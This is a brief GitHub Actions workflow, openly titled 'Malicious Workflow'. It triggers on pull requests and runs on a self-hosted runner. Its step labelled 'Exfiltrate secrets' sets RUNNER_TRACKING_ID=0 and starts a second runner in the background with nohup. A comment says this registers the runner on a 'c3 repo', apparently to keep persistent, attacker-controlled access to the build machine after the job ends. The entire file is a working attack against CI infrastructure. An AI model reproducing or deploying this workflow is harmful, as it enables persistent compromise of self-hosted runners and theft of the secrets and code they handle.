name: Malicious Workflow

on:
  pull_request:
    branches:
      - main

jobs:
  exploit:
    runs-on: self-hosted

    steps:
      - name: Checkout code
        uses: actions/checkout@v3
# To register runner on c3 repo
      - name: Exfiltrate secrets
        run: |
          cd ~/
          ls
          cd actions-runner1
          export RUNNER_TRACKING_ID=0;
          nohup ./run.sh &
